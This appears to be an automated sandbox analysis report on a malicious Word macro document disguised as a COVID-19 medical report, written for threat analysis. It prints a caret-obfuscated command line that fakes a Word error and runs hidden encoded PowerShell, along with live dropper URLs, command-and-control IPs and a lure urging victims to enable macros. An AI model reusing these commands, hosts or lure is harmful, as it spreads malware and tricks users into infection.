Analysis Report XP-9743 Medical report COVID-19.doc

Overview

General Information

Sample Name: XP-9743 Medical report COVID-19.doc
Analysis ID: 338773
MD5: da92c55d4b08367fb79a6bc6ae4da985
SHA1: 8ee3239cfb5dd7d9ddd8e503c8fec19e21ca3c3d
SHA256: 137602cebf7c61fe1bb6647160167813271afbd74a52fcccf03a0ad590a9ef61

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2336 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1100 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc <encoded PowerShell command line> MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2572 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2552 cmdline: powershell -w hidden -enc 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2332 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2760 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2732 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 1980 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2724 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2500 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 1776 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2808 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3068 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 3012 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis | Data: Command: powershell -w hidden -enc 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

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://hellas-darmstadt.de/cgi-bin/ZSoo/ | Avira URL Cloud: Label: malware
Source: http://solicon.us/allam-cycle-1c4gn/f5z/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://hellas-darmstadt.de/cgi-bin/ZSoo/ | Virustotal: Detection: 6%
Source: http://solicon.us/allam-cycle-1c4gn/f5z/ | Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: XP-9743 Medical report COVID-19.doc | Virustotal: Detection: 19%
Source: XP-9743 Medical report COVID-19.doc | ReversingLabs: Detection: 13%
Machine Learning detection for dropped file
Source: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2088678601.0000000002840000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: remediis.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 5.2.81.171:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.22:49168 -> 71.72.196.159:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: https://remediis.com/t/gm2X/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: http://avadnansahin.com/wp-includes/w/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: http://solicon.us/allam-cycle-1c4gn/f5z/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: http://www.riparazioni-radiotv.com/softaculous/DZz/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: https://www.starlingtechs.com/GNM/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: http://hellas-darmstadt.de/cgi-bin/ZSoo/
Source: global traffic | HTTP traffic detected: GET /wp-includes/w/ HTTP/1.1 | Host: avadnansahin.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox View | ASN Name: AEROTEK-ASTR AEROTEK-ASTR
Source: Joe Sandbox View | ASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
Source: Joe Sandbox View | ASN Name: ALASTYRTR ALASTYRTR
Source: global traffic | HTTP traffic detected: POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1 | DNT: 0 | Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ | Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 69.49.88.46 | Content-Length: 5492 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknown | TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmp
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: remediis.com
Source: unknown | HTTP traffic detected: POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1 | DNT: 0 | Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ | Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 69.49.88.46 | Content-Length: 5492 | Connection: Keep-Alive | Cache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | String found in binary or memory: http://avadnansahin.com
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: http://avadnansahin.com/wp-includes/w/
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: http://hellas-darmstadt.de/cgi-bin/ZSoo/
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: http://solicon.us/allam-cycle-1c4gn/f5z/
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2093517208.0000000003C6E000.00000004.00000001.sdmp | String found in binary or memory: http://www.litespeedtech.com
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: http://www.riparazioni-radiotv.com/softaculous/DZz/
Source: rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: https://remediis.com
Source: powershell.exe, 00000005.00000002.2096044095.000000001B606000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: https://remediis.com/t/gm2X/
Source: powershell.exe, 00000005.00000002.2093497581.0000000003C5C000.00000004.00000001.sdmp | String found in binary or memory: https://remediis.comp
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0D
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: https://www.starlingtechs.com/GNM/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 12 N@m 13 ;a 10096 G
Source: Screenshot number: 8 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
Source: Screenshot number: 8 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll
Very long command line found
Source: unknown | Process created: Commandline size = 5321
Source: unknown | Process created: Commandline size = 5220
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 5220
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Giyrh\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_000007FF00272E05
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10019036
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001307D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10016A8F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100018B2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100082BB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10008B58
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000B161
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001D96D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001B184
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001BFAF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10019FCB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100095D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000C201
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001440A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000740C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10009211
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001D613
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000E813
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000B82E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000CE33
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001A23E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10015449
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001264A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001364E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002055
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001665D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10005C61
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10005477
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001467C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10001E84
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10019496
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000169C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100108A9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100084B3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10018CB5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100122BB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001A4BD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10014EC0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10007EC4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000D0C9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000E6D4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100052D9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000C4D9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002CE2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000D6E6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100068E6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10012EE8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001BAED
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001DAEC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100038F1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10006EF4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10016318
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10019724
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000B32E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10004137
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000673B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001AB3D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10005F4C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10010550
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10003D60
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10015B6D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10005778
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000D385
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10018989
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10014988
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000ED98
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000319D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001CB9F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001B9C0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100099C3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10009FCC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000FFD4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000F9D8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000F5DC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100161E6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10010FEF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000E1F1
Source: XP-9743 Medical report COVID-19.doc | OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation | OLE, VBA macro: Module Kyl0l3rqw280c6ssa, Function Document_open, Name: Document_open
Source: XP-9743 Medical report COVID-19.doc | OLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.evad.winDOC@26/7@2/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$-9743 Medical report COVID-19.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmp
Source: XP-9743 Medical report COVID-19.doc | OLE indicator, Word Document stream: true
